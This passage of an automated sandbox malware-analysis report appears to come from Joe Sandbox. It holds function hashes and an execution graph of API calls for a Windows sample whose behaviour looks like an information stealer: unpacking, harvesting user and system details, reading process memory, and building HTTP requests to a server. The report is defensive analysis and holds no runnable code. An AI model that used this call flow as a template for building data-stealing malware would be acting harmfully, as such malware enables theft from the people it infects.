                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                              • String ID:
                                                              • API String ID: 1717984340-0
                                                              • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                              • Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
                                                              • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                              • Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02472AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02472AAD,00000000), ref: 0249B187
                                                              • GetLastError.KERNEL32 ref: 0249B195
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,02472AAD,00000000), ref: 0249B1F0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                              • String ID:
                                                              • API String ID: 1717984340-0
                                                              • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                              • Instruction ID: c066610513b409a7f41cbeb56effab23d5d1aa2c42a6952ac498485592969778
                                                              • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                              • Instruction Fuzzy Hash: 8B41F631604216AFCF21CFA9EC48BBF7FA5EF41758F14416BE8599B2A0DB708901CB60

                                                              Execution Graph

                                                              Execution Coverage:4.7%
                                                              Dynamic/Decrypted Code Coverage:6.8%
                                                              Signature Coverage:19.8%
                                                              Total number of Nodes:1545
                                                              Total number of Limit Nodes:37
                                                              execution_graph 34086 409e40 10 API calls 34087 418240 12 API calls 34088 407641 free 34039 422940 GetCurrentProcess IsWow64Process 34041 2490b4f 1691 API calls 33989 249964e 6 API calls 2 library calls 33990 248c642 22 API calls 34090 2492417 ReadProcessMemory ReadProcessMemory VirtualQueryEx ??_V@YAXPAX 34042 2488f43 StrCmpCA ExitProcess strtok_s strtok_s 34043 2497b47 5 API calls 3 library calls 34044 2479357 19 API calls 34091 408e50 strlen malloc strcpy_s free std::_Xinvalid_argument 34045 247e167 490 API calls 34046 421550 lstrcpy lstrcpy lstrcpy lstrcpy 33991 2492a5a lstrcpy 33992 249964f 173 API calls 2 library calls 34047 247bf50 84 API calls 34133 248cc4e 11 API calls 34049 40b960 120 API calls 34134 417f60 7 API calls 34050 248870e strtok_s 33993 247b660 92 API calls 33994 2487260 142 API calls 34051 2492f67 11 API calls 34135 2492d67 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 32990 405570 GetProcessHeap RtlAllocateHeap InternetOpenA InternetOpenUrlA 32991 4055d1 32990->32991 32992 405627 InternetCloseHandle InternetCloseHandle 32990->32992 32993 4055d8 InternetReadFile 32991->32993 32994 405623 32991->32994 32995 405600 KiUserExceptionDispatcher 32991->32995 32996 40563f 32992->32996 32993->32991 32993->32994 32994->32992 32995->32991 32995->32995 33995 40a070 12 API calls 33998 417c70 11 API calls 33999 248ae79 114 API calls 34138 2477557 VirtualProtect 34000 2471673 8 API calls 34001 409876 157 API calls 34052 2483f70 238 API calls 34139 2486970 454 API calls 34140 248890d 46 API calls 34002 2495e74 memmove RaiseException __CxxThrowException@8 34053 40897f RaiseException __CxxThrowException@8 32514 406000 32515 406020 32514->32515 32516 406035 32515->32516 32518 40602d lstrcpy 32515->32518 32658 404ae0 32516->32658 32518->32516 32519 406040 32520 40607c lstrcpy 32519->32520 32521 406088 32519->32521 32520->32521 32522 4060af lstrcpy 32521->32522 32523 4060bb 32521->32523 32522->32523 32524 4060df lstrcpy 32523->32524 32525 4060eb 32523->32525 32524->32525 32526 40611a lstrcpy 32525->32526 32527 406126 32525->32527 32526->32527 32528 406159 InternetOpenA StrCmpCA 32527->32528 32529 40614d lstrcpy 32527->32529 32530 40618d 32528->32530 32529->32528 32531 40684e InternetCloseHandle CryptStringToBinaryA 32530->32531 32662 423e10 32530->32662 32532 40687e LocalAlloc 32531->32532 32558 40696e 32531->32558 32534 406895 CryptStringToBinaryA 32532->32534 32532->32558 32535 4068ad LocalFree 32534->32535 32536 4068bf lstrlenA 32534->32536 32535->32558 32537 4068d3 32536->32537 32539 4068f9 lstrlenA 32537->32539 32540 4068ed lstrcpy 32537->32540 32538 4061a7 32541 4061d0 lstrcpy lstrcatA 32538->32541 32542 4061e5 32538->32542 32544 406913 32539->32544 32540->32539 32541->32542 32543 406207 lstrcpy 32542->32543 32546 40620f 32542->32546 32543->32546 32545 406925 lstrcpy lstrcatA 32544->32545 32547 406938 32544->32547 32545->32547 32548 40621e lstrlenA 32546->32548 32549 406967 32547->32549 32551 40695f lstrcpy 32547->32551 32550 406236 32548->32550 32549->32558 32552 406242 lstrcpy lstrcatA 32550->32552 32553 406259 32550->32553 32551->32549 32552->32553 32554 406282 32553->32554 32555 40627a lstrcpy 32553->32555 32556 406289 lstrlenA 32554->32556 32555->32554 32557 40629f 32556->32557 32559 4062ab lstrcpy lstrcatA 32557->32559 32560 4062c2 32557->32560 32559->32560 32561 4062e3 lstrcpy 32560->32561 32562 4062ed 32560->32562 32561->32562 32563 406314 lstrcpy lstrcatA 32562->32563 32564 40632a 32562->32564 32563->32564 32565 406353 32564->32565 32566 40634b lstrcpy 32564->32566 32567 40635a lstrlenA 32565->32567 32566->32565 32568 406370 32567->32568 32569 40637c lstrcpy lstrcatA 32568->32569 32570 406393 32568->32570 32569->32570 32571 4063bb 32570->32571 32572 4063b3 lstrcpy 32570->32572 32573 4063c2 lstrlenA 32571->32573 32572->32571 32574 4063d8 32573->32574 32575 4063e2 lstrcpy lstrcatA 32574->32575 32576 4063f6 32574->32576 32575->32576 32577 40641c 32576->32577 32578 406414 lstrcpy 32576->32578 32579 406423 lstrlenA 32577->32579 32578->32577 32580 40643e 32579->32580 32581 40644f lstrcpy lstrcatA 32580->32581 32582 40645f 32580->32582 32581->32582 32583 40647d lstrcpy lstrcatA 32582->32583 32584 406490 32582->32584 32583->32584 32585 4064ae lstrcpy 32584->32585 32586 4064b6 32584->32586 32585->32586 32587 4064c4 InternetConnectA 32586->32587 32587->32531 32588 4064f3 HttpOpenRequestA 32587->32588 32589 406847 InternetCloseHandle 32588->32589 32590 40652e 32588->32590 32589->32531 32669 427340 lstrlenA 32590->32669 32594 406547 32677 4272f0 32594->32677 32597 4272b0 lstrcpy 32598 406563 32597->32598 32599 427340 3 API calls 32598->32599 32600 406578 32599->32600 32601 4272b0 lstrcpy 32600->32601 32602 406581 32601->32602 32603 427340 3 API calls 32602->32603 32604 406597 32603->32604 32605 4272b0 lstrcpy 32604->32605 32606 4065a0 32605->32606 32607 427340 3 API calls 32606->32607 32608 4065b6 32607->32608 32609 4272b0 lstrcpy 32608->32609 32610 4065bf 32609->32610 32611 427340 3 API calls 32610->32611 32612 4065d4 32611->32612 32613 4272b0 lstrcpy 32612->32613 32614 4065dd 32613->32614 32615 4272f0 2 API calls 32614->32615 32616 4065f0 32615->32616 32617 4272b0 lstrcpy 32616->32617 32618 4065f9 32617->32618 32619 427340 3 API calls 32618->32619 32620 40660e 32619->32620 32621 4272b0 lstrcpy 32620->32621 32622 406617 32621->32622 32623 427340 3 API calls 32622->32623 32624 40662c 32623->32624 32625 4272b0 lstrcpy 32624->32625 32626 406635 32625->32626 32627 4272f0 2 API calls 32626->32627 32628 406648 32627->32628 32629 4272b0 lstrcpy 32628->32629 32630 406651 32629->32630 32631 427340 3 API calls 32630->32631 32632 406666 32631->32632 32633 4272b0 lstrcpy 32632->32633 32634 40666f 32633->32634 32635 427340 3 API calls 32634->32635 32636 406685 32635->32636 32637 4272b0 lstrcpy 32636->32637 32638 40668e 32637->32638 32639 427340 3 API calls 32638->32639 32640 4066a4 32639->32640 32641 4272b0 lstrcpy 32640->32641 32642 4066ad 32641->32642 32643 427340 3 API calls 32642->32643 32644 4066c2 32643->32644 32645 4272b0 lstrcpy 32644->32645 32646 4066cb 32645->32646 32647 4272f0 2 API calls 32646->32647 32648 4066e1 32647->32648 32649 4272b0 lstrcpy 32648->32649 32650 4066ea 32649->32650 32651 4066f2 12 API calls 32650->32651 32652 40683a InternetCloseHandle 32651->32652 32655 40678b 32651->32655 32652->32589 32653 40679b lstrlenA 32653->32655 32654 4067cc lstrcpy lstrcatA 32654->32655 32655->32652 32655->32653 32655->32654 32656 406809 lstrcpy 32655->32656 32657 406818 InternetReadFile 32655->32657 32656->32655 32657->32652 32657->32655 32659 404af0 32658->32659 32659->32659 32660 404af7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlenA InternetCrackUrlA 32659->32660 32661 404b61 32660->32661 32661->32519 32663 423e23 32662->32663 32664 423e3f lstrcpy 32663->32664 32665 423e4b 32663->32665 32664->32665 32666 423e75 GetSystemTime 32665->32666 32667 423e6d lstrcpy 32665->32667 32668 423e93 32666->32668 32667->32666 32668->32538 32671 42735d 32669->32671 32670 40653e 32673 4272b0 32670->32673 32671->32670 32672 42736d lstrcpy lstrcatA 32671->32672 32672->32670 32674 4272bc 32673->32674 32675 4272e4 32674->32675 32676 4272dc lstrcpy 32674->32676 32675->32594 32676->32675 32679 42730c 32677->32679 32678 40655a 32678->32597 32679->32678 32680 42731d lstrcpy lstrcatA 32679->32680 32680->32678 32835 418d00 StrCmpCA 32836 418d26 ExitProcess 32835->32836 32837 418d2d strtok_s 32835->32837 32838 418f42 32837->32838 32853 418d4c 32837->32853 32839 418f23 strtok_s 32839->32838 32839->32853 32840 418de4 StrCmpCA 32840->32839 32840->32853 32841 418e04 StrCmpCA 32841->32839 32842 418d66 lstrlenA 32842->32853 32843 418ee8 lstrlenA 32843->32853 32844 418ecf StrCmpCA 32844->32839 32844->32853 32845 418d90 lstrlenA 32845->32853 32846 418eb6 StrCmpCA 32846->32839 32846->32853 32847 418dba lstrlenA 32847->32853 32848 418e1d StrCmpCA 32848->32839 32848->32853 32849 418e3d StrCmpCA 32849->32839 32849->32853 32850 418e5d StrCmpCA 32850->32839 32850->32853 32851 418e7d StrCmpCA 32851->32839 32851->32853 32852 418e9d StrCmpCA 32852->32839 32852->32853 32853->32839 32853->32840 32853->32841 32853->32842 32853->32843 32853->32844 32853->32845 32853->32846 32853->32847 32853->32848 32853->32849 32853->32850 32853->32851 32853->32852 32854 418f1b lstrcpy 32853->32854 32854->32839 32855 41f300 lstrlenA 32856 41f33e 32855->32856 32857 41f352 lstrlenA 32856->32857 32858 41f346 lstrcpy 32856->32858 32859 41f363 32857->32859 32858->32857 32860 41f377 lstrlenA 32859->32860 32861 41f36b lstrcpy 32859->32861 32862 41f388 32860->32862 32861->32860 32863 41f390 lstrcpy 32862->32863 32864 41f39c 32862->32864 32863->32864 32865 41f3b8 lstrcpy 32864->32865 32866 41f3c4 32864->32866 32865->32866 32867 41f3e6 lstrcpy 32866->32867 32868 41f3f2 32866->32868 32867->32868 32869 41f41c lstrcpy 32868->32869 32870 41f428 32868->32870 32869->32870 32871 41f44e lstrcpy 32870->32871 32932 41f460 32870->32932 32871->32932 32872 41f46c lstrlenA 32872->32932 32873 41f626 lstrcpy 32873->32932 32874 41f504 lstrcpy 32874->32932 32875 41f529 lstrcpy 32875->32932 32876 41f656 lstrcpy 32937 41f65e 32876->32937 32877 41f100 36 API calls 32877->32937 32878 41f5e0 lstrcpy 32878->32932 32879 41f88a StrCmpCA 32886 420061 32879->32886 32879->32932 32880 41f788 StrCmpCA 32880->32879 32880->32937 32881 41f70d lstrcpy 32881->32937 32882 41fbcb StrCmpCA 32892 41fff8 32882->32892 32882->32932 32883 41f8ba lstrlenA 32883->32932 32884 41ff0b StrCmpCA 32890 41ff1f Sleep 32884->32890 32899 41ff35 32884->32899 32885 420083 lstrlenA 32896 42009f 32885->32896 32886->32885 32887 42007b lstrcpy 32886->32887 32887->32885 32888 41f7be lstrcpy 32888->32937 32889 41fbfb lstrlenA 32889->32932 32890->32932 32891 42001a lstrlenA 32900 420036 32891->32900 32892->32891 32893 420012 lstrcpy 32892->32893 32893->32891 32894 41fa26 lstrcpy 32894->32932 32895 4200c0 lstrlenA 32911 4200dc 32895->32911 32896->32895 32901 4200b8 lstrcpy 32896->32901 32897 41f8ed lstrcpy 32897->32932 32898 41ff57 lstrlenA 32906 41ff73 32898->32906 32899->32898 32902 41ff4f lstrcpy 32899->32902 32905 41ff94 lstrlenA 32900->32905 32910 42004f lstrcpy 32900->32910 32901->32895 32902->32898 32903 41fd66 lstrcpy 32903->32932 32904 41fc2e lstrcpy 32904->32932 32916 41ffb0 32905->32916 32906->32905 32914 41ff8c lstrcpy 32906->32914 32908 41fa56 lstrcpy 32908->32937 32909 41f910 lstrcpy 32909->32932 32910->32905 32912 4200fd 32911->32912 32917 4200f5 lstrcpy 32911->32917 32918 401510 4 API calls 32912->32918 32913 401410 8 API calls 32913->32932 32914->32905 32915 41fd96 lstrcpy 32915->32937 32922 41ffd1 32916->32922 32923 41ffc9 lstrcpy 32916->32923 32917->32912 32939 41ffdd 32918->32939 32919 41f812 lstrcpy 32919->32937 32920 41efe0 28 API calls 32920->32932 32921 41fc51 lstrcpy 32921->32932 32940 401510 32922->32940 32923->32922 32925 41f964 lstrcpy 32925->32932 32926 41fab5 lstrcpy 32926->32937 32927 41fb30 StrCmpCA 32927->32882 32927->32937 32928 41fca5 lstrcpy 32928->32932 32929 41fdf5 lstrcpy 32929->32937 32930 41fe70 StrCmpCA 32930->32884 32930->32937 32931 41fb63 lstrcpy 32931->32937 32932->32872 32932->32873 32932->32874 32932->32875 32932->32876 32932->32878 32932->32879 32932->32882 32932->32883 32932->32884 32932->32889 32932->32894 32932->32897 32932->32903 32932->32904 32932->32908 32932->32909 32932->32913 32932->32915 32932->32920 32932->32921 32932->32925 32932->32928 32932->32937 32933 41efe0 28 API calls 32933->32937 32934 41fea3 lstrcpy 32934->32937 32935 401410 8 API calls 32935->32937 32936 41fbb7 lstrcpy 32936->32937 32937->32877 32937->32880 32937->32881 32937->32882 32937->32884 32937->32888 32937->32919 32937->32926 32937->32927 32937->32929 32937->32930 32937->32931 32937->32932 32937->32933 32937->32934 32937->32935 32937->32936 32938 41fef7 lstrcpy 32937->32938 32938->32937 32941 40151f 32940->32941 32942 40152b lstrcpy 32941->32942 32943 401533 32941->32943 32942->32943 32944 40154d lstrcpy 32943->32944 32945 401555 32943->32945 32944->32945 32946 40156f lstrcpy 32945->32946 32948 401577 32945->32948 32946->32948 32947 401599 32947->32939 32948->32947 32949 401591 lstrcpy 32948->32949 32949->32947 34054 2498708 162 API calls 2 library calls 34096 425a00 12 API calls 34004 24881fc lstrlen lstrcpy strtok_s 34098 2470001 8 API calls 32971 9edbd9 32972 9edbe9 32971->32972 32975 9ede26 32972->32975 32976 9ede35 32975->32976 32979 9ee5c6 32976->32979 32980 9ee5e1 32979->32980 32981 9ee5ea CreateToolhelp32Snapshot 32980->32981 32982 9ee606 Module32First 32980->32982 32981->32980 32981->32982 32983 9ee615 32982->32983 32985 9ede25 32982->32985 32986 9ee285 32983->32986 32987 9ee2b0 32986->32987 32988 9ee2f9 32987->32988 32989 9ee2c1 VirtualAlloc 32987->32989 32988->32988 32989->32988 34005 2475a00 54 API calls 34055 2494707 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 34099 406a10 16 API calls 34143 407b10 170 API calls 33803 426710 33804 426b2e 8 API calls 33803->33804 33805 42671d 43 API calls 33803->33805 33806 426bc4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33804->33806 33807 426c38 33804->33807 33805->33804 33806->33807 33808 426d02 33807->33808 33809 426c45 8 API calls 33807->33809 33810 426d0b GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33808->33810 33811 426d7f 33808->33811 33809->33808 33810->33811 33812 426e19 33811->33812 33813 426d8c 6 API calls 33811->33813 33814 426f40 33812->33814 33815 426e26 12 API calls 33812->33815 33813->33812 33816 426f49 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33814->33816 33817 426fbd 33814->33817 33815->33814 33816->33817 33818 426ff1 33817->33818 33819 426fc6 GetProcAddress GetProcAddress 33817->33819 33820 427025 33818->33820 33821 426ffa GetProcAddress GetProcAddress 33818->33821 33819->33818 33822 427032 10 API calls 33820->33822 33823 42711d 33820->33823 33821->33820 33822->33823 33824 427182 33823->33824 33825 427126 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33823->33825 33826 42718b GetProcAddress 33824->33826 33827 42719e 33824->33827 33825->33824 33826->33827 33828 427203 33827->33828 33829 4271a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33827->33829 33829->33828 34056 2478f10 ??2@YAPAXI RaiseException 34101 247fc10 139 API calls 34006 2499a10 SetUnhandledExceptionFilter 34007 2492e17 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 34057 2488329 7 API calls 34102 248870e StrCmpCA strtok_s 32950 422820 GetProcessHeap HeapAlloc 32957 4228b0 GetProcessHeap HeapAlloc RegOpenKeyExA 32950->32957 32952 422849 32953 422850 32952->32953 32954 42285a RegOpenKeyExA 32952->32954 32955 422892 RegCloseKey 32954->32955 32956 42287b RegQueryValueExA 32954->32956 32956->32955 32958 4228f5 RegQueryValueExA 32957->32958 32959 42290b RegCloseKey 32957->32959 32958->32959 32960 422920 32959->32960 32960->32952 32960->32960 34008 424020 SHGetFolderPathA lstrcpy 34009 247a620 158 API calls 34103 2471820 194 API calls 33634 41ef30 33635 41ef50 33634->33635 33636 41ef68 33635->33636 33637 41ef60 lstrcpy 33635->33637 33642 401410 33636->33642 33637->33636 33641 41ef7e 33643 401510 4 API calls 33642->33643 33644 40141b 33643->33644 33645 401435 lstrcpy 33644->33645 33646 40143d 33644->33646 33645->33646 33647 401457 lstrcpy 33646->33647 33648 40145f 33646->33648 33647->33648 33649 401479 lstrcpy 33648->33649 33651 401481 33648->33651 33649->33651 33650 4014e5 33653 4056c0 33650->33653 33651->33650 33652 4014dd lstrcpy 33651->33652 33652->33650 33654 4056e0 33653->33654 33655 4056f5 33654->33655 33656 4056ed lstrcpy 33654->33656 33657 404ae0 5 API calls 33655->33657 33656->33655 33658 405700 33657->33658 33801 424090 CryptBinaryToStringA GetProcessHeap HeapAlloc CryptBinaryToStringA 33658->33801 33660 405736 lstrlenA 33802 424090 CryptBinaryToStringA GetProcessHeap HeapAlloc CryptBinaryToStringA 33660->33802 33662 405755 33663 40577e lstrcpy 33662->33663 33664 40578a 33662->33664 33663->33664 33665 4057bd lstrcpy 33664->33665 33666 4057c9 33664->33666 33665->33666 33667 4057ed lstrcpy 33666->33667 33668 4057f9 33666->33668 33667->33668 33669 405822 lstrcpy 33668->33669 33670 40582e 33668->33670 33669->33670 33671 405868 InternetOpenA StrCmpCA 33670->33671 33672 40585c lstrcpy 33670->33672 33673 40589c 33671->33673 33672->33671 33674 405f34 InternetCloseHandle 33673->33674 33675 423e10 3 API calls 33673->33675 33693 405f6a 33674->33693 33676 4058b6 33675->33676 33677 4058de lstrcpy lstrcatA 33676->33677 33678 4058f3 33676->33678 33677->33678 33679 405912 lstrcpy 33678->33679 33680 40591a 33678->33680 33679->33680 33681 405929 lstrlenA 33680->33681 33682 405941 33681->33682 33683 40594e lstrcpy lstrcatA 33682->33683 33684 405962 33682->33684 33683->33684 33685 40598f lstrlenA 33684->33685 33687 40597c lstrcpy lstrcatA 33684->33687 33686 4059a5 33685->33686 33688 4059af lstrcpy lstrcatA 33686->33688 33689 4059c3 33686->33689 33687->33685 33688->33689 33690 4059e2 lstrcpy 33689->33690 33691 4059ea 33689->33691 33690->33691 33692 4059ff lstrlenA 33691->33692 33694 405a1a 33692->33694 33693->33641 33695 405a2b lstrcpy lstrcatA 33694->33695 33696 405a3b 33694->33696 33695->33696 33697 405a59 lstrcpy lstrcatA 33696->33697 33698 405a6c 33696->33698 33697->33698 33699 405a8a lstrcpy 33698->33699 33700 405a92 33698->33700 33699->33700 33701 405aa0 InternetConnectA 33700->33701 33702 405f2e 33701->33702 33703 405acf HttpOpenRequestA 33701->33703 33702->33674 33704 405f27 InternetCloseHandle 33703->33704 33705 405b0b 33703->33705 33704->33702 33706 427340 3 API calls 33705->33706 33707 405b1b 33706->33707 33708 4272b0 lstrcpy 33707->33708 33709 405b24 33708->33709 33710 4272f0 2 API calls 33709->33710 33711 405b37 33710->33711 33712 4272b0 lstrcpy 33711->33712 33713 405b40 33712->33713 33714 427340 3 API calls 33713->33714 33715 405b55 33714->33715 33716 4272b0 lstrcpy 33715->33716 33717 405b5e 33716->33717 33718 427340 3 API calls 33717->33718 33719 405b74 33718->33719 33720 4272b0 lstrcpy 33719->33720 33721 405b7d 33720->33721 33722 427340 3 API calls 33721->33722 33723 405b93 33722->33723 33724 4272b0 lstrcpy 33723->33724 33725 405b9c 33724->33725 33726 427340 3 API calls 33725->33726 33727 405bb1 33726->33727 33728 4272b0 lstrcpy 33727->33728 33729 405bba 33728->33729 33730 4272f0 2 API calls 33729->33730 33731 405bcd 33730->33731 33732 4272b0 lstrcpy 33731->33732 33733 405bd6 33732->33733 33734 427340 3 API calls 33733->33734 33735 405beb 33734->33735 33736 4272b0 lstrcpy 33735->33736 33737 405bf4 33736->33737 33738 427340 3 API calls 33737->33738 33739 405c09 33738->33739 33740 4272b0 lstrcpy 33739->33740 33741 405c12 33740->33741 33742 4272f0 2 API calls 33741->33742 33743 405c25 33742->33743 33744 4272b0 lstrcpy 33743->33744 33745 405c2e 33744->33745 33746 427340 3 API calls 33745->33746 33747 405c43 33746->33747 33748 4272b0 lstrcpy 33747->33748 33749 405c4c 33748->33749 33750 427340 3 API calls 33749->33750 33751 405c62 33750->33751 33752 4272b0 lstrcpy 33751->33752 33753 405c6b 33752->33753 33754 427340 3 API calls 33753->33754 33755 405c81 33754->33755 33756 4272b0 lstrcpy 33755->33756 33757 405c8a 33756->33757 33758 427340 3 API calls 33757->33758 33759 405c9f 33758->33759 33760 4272b0 lstrcpy 33759->33760 33761 405ca8 33760->33761 33762 427340 3 API calls 33761->33762 33763 405cbb 33762->33763 33764 4272b0 lstrcpy 33763->33764 33765 405cc4 33764->33765 33766 427340 3 API calls 33765->33766 33767 405cd9 33766->33767 33768 4272b0 lstrcpy 33767->33768 33769 405ce2 33768->33769 33770 427340 3 API calls 33769->33770 33771 405cf7 33770->33771 33772 4272b0 lstrcpy 33771->33772 33773 405d00 33772->33773 33774 4272f0 2 API calls 33773->33774 33775 405d13 33774->33775 33776 4272b0 lstrcpy 33775->33776 33777 405d1c 33776->33777 33778 427340 3 API calls 33777->33778 33779 405d31 33778->33779 33780 4272b0 lstrcpy 33779->33780 33781 405d3a 33780->33781 33782 427340 3 API calls 33781->33782 33783 405d50 33782->33783 33784 4272b0 lstrcpy 33783->33784 33785 405d59 33784->33785 33786 427340 3 API calls 33785->33786 33787 405d6f 33786->33787 33788 4272b0 lstrcpy 33787->33788 33789 405d78 33788->33789 33790 427340 3 API calls 33789->33790 33791 405d8d 33790->33791 33792 4272b0 lstrcpy 33791->33792 33793 405d96 33792->33793 33794 405d9e 14 API calls 33793->33794 33795 405f1a InternetCloseHandle 33794->33795 33798 405e6a 33794->33798 33795->33704 33796 405e7b lstrlenA 33796->33798 33797 405eac lstrcpy lstrcatA 33797->33798 33798->33795 33798->33796 33798->33797 33799 405ee9 lstrcpy 33798->33799 33800 405ef8 InternetReadFile 33798->33800 33799->33798 33800->33795 33800->33798 33801->33660 33802->33662 34105 406e32 memcpy memcpy GetProcessHeap HeapAlloc memcpy 34061 247d730 133 API calls 33970 247003c 33971 2470049 33970->33971 33983 2470e0f SetErrorMode SetErrorMode 33971->33983 33976 2470265 33977 24702ce VirtualProtect 33976->33977 33979 247030b 33977->33979 33978 2470439 VirtualFree 33982 24704be LoadLibraryA 33978->33982 33979->33978 33981 24708c7 33982->33981 33984 2470223 33983->33984 33985 2470d90 33984->33985 33986 2470dad 33985->33986 33987 2470dbb GetPEB 33986->33987 33988 2470238 VirtualAlloc 33986->33988 33987->33988 33988->33976 34062 2497735 43 API calls ctype 34063 2499656 170 API calls setSBUpLow 34011 2491e37 2089 API calls 34064 2494b37 32 API calls 34065 2493337 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 34109 425ac0 9 API calls 34067 248c7c0 ShellExecuteEx 34111 248cc4e StrCmpCA StrCmpCA StrCmpCA strtok_s 34150 24999c5 41 API calls __amsg_exit 34012 408cce memcpy 34013 2493ec7 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 34151 24935c7 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 34014 409cd0 18 API calls 33830 421bd0 33855 4029a0 33830->33855 33834 421be3 33835 421c15 GetUserDefaultLangID 33834->33835 33836 421c3e 33835->33836 33956 422a70 GetProcessHeap HeapAlloc GetComputerNameA 33836->33956 33838 421c43 33839 421c6d lstrlenA 33838->33839 33840 421c85 33839->33840 33841 421ca9 lstrlenA 33840->33841 33842 421cbf 33841->33842 33843 422a70 3 API calls 33842->33843 33844 421ce5 lstrlenA 33843->33844 33845 421cfa 33844->33845 33846 421d20 lstrlenA 33845->33846 33847 421d36 33846->33847 33958 4229e0 GetProcessHeap HeapAlloc GetUserNameA 33847->33958 33849 421d59 lstrlenA 33850 421d6d 33849->33850 33851 421ddc OpenEventA 33850->33851 33852 421e14 CreateEventA 33851->33852 33959 421b00 GetSystemTime 33852->33959 33854 421e28 33856 404980 34 API calls 33855->33856 33857 4029b1 33856->33857 33858 404980 34 API calls 33857->33858 33859 4029c7 33858->33859 33860 404980 34 API calls 33859->33860 33861 4029dd 33860->33861 33862 404980 34 API calls 33861->33862 33863 4029f3 33862->33863 33864 404980 34 API calls 33863->33864 33865 402a09 33864->33865 33866 404980 34 API calls 33865->33866 33867 402a1f 33866->33867 33868 404980 34 API calls 33867->33868 33869 402a38 33868->33869 33870 404980 34 API calls 33869->33870 33871 402a4e 33870->33871 33872 404980 34 API calls 33871->33872 33873 402a64 33872->33873 33874 404980 34 API calls 33873->33874 33875 402a7a 33874->33875 33876 404980 34 API calls 33875->33876 33877 402a90 33876->33877 33878 404980 34 API calls 33877->33878 33879 402aa6 33878->33879 33880 404980 34 API calls 33879->33880 33881 402abf 33880->33881 33882 404980 34 API calls 33881->33882 33883 402ad5 33882->33883 33884 404980 34 API calls 33883->33884 33885 402aeb 33884->33885 33886 404980 34 API calls 33885->33886 33887 402b01 33886->33887 33888 404980 34 API calls 33887->33888 33889 402b17 33888->33889 33890 404980 34 API calls 33889->33890 33891 402b2d 33890->33891 33892 404980 34 API calls 33891->33892 33893 402b46 33892->33893 33894 404980 34 API calls 33893->33894 33895 402b5c 33894->33895 33896 404980 34 API calls 33895->33896 33897 402b72 33896->33897 33898 404980 34 API calls 33897->33898 33899 402b88 33898->33899 33900 404980 34 API calls 33899->33900 33901 402b9e 33900->33901 33902 404980 34 API calls 33901->33902 33903 402bb4 33902->33903 33904 404980 34 API calls 33903->33904 33905 402bcd 33904->33905 33906 404980 34 API calls 33905->33906 33907 402be3 33906->33907 33908 404980 34 API calls 33907->33908 33909 402bf9 33908->33909 33910 404980 34 API calls 33909->33910 33911 402c0f 33910->33911 33912 404980 34 API calls 33911->33912 33913 402c25 33912->33913 33914 404980 34 API calls 33913->33914 33915 402c3b 33914->33915 33916 404980 34 API calls 33915->33916 33917 402c54 33916->33917 33918 404980 34 API calls 33917->33918 33919 402c6a 33918->33919 33920 404980 34 API calls 33919->33920 33921 402c80 33920->33921 33922 404980 34 API calls 33921->33922 33923 402c96 33922->33923 33924 404980 34 API calls 33923->33924 33925 402cac 33924->33925 33926 404980 34 API calls 33925->33926 33927 402cc2 33926->33927 33928 404980 34 API calls 33927->33928 33929 402cdb 33928->33929 33930 404980 34 API calls 33929->33930 33931 402cf1 33930->33931 33932 404980 34 API calls 33931->33932 33933 402d07 33932->33933 33934 404980 34 API calls 33933->33934 33935 402d1d 33934->33935 33936 404980 34 API calls 33935->33936 33937 402d33 33936->33937 33938 404980 34 API calls 33937->33938 33939 402d49 33938->33939 33940 404980 34 API calls 33939->33940 33941 402d62 33940->33941 33942 4263c0 GetPEB 33941->33942 33943 4265f3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 33942->33943 33944 4263f3 33942->33944 33945 426655 GetProcAddress 33943->33945 33946 426668 33943->33946 33951 426407 20 API calls 33944->33951 33945->33946 33947 426671 GetProcAddress GetProcAddress 33946->33947 33948 42669c 33946->33948 33947->33948 33949 4266a5 GetProcAddress 33948->33949 33950 4266b8 33948->33950 33949->33950 33952 4266c1 GetProcAddress 33950->33952 33953 4266d4 33950->33953 33951->33943 33952->33953 33954 426707 33953->33954 33955 4266dd GetProcAddress GetProcAddress 33953->33955 33954->33834 33955->33954 33957 422ac4 33956->33957 33957->33838 33958->33849 33967 421800 25 API calls 33959->33967 33961 421b61 sscanf 33968 402930 33961->33968 33964 421bb6 33965 421bc9 33964->33965 33966 421bc2 ExitProcess 33964->33966 33965->33854 33967->33961 33969 402934 SystemTimeToFileTime SystemTimeToFileTime 33968->33969 33969->33964 33969->33965 34068 248e3d0 140 API calls 34015 2479add 41 API calls 34017 2492ed7 GetUserDefaultLocaleName LocalAlloc CharToOemW 34153 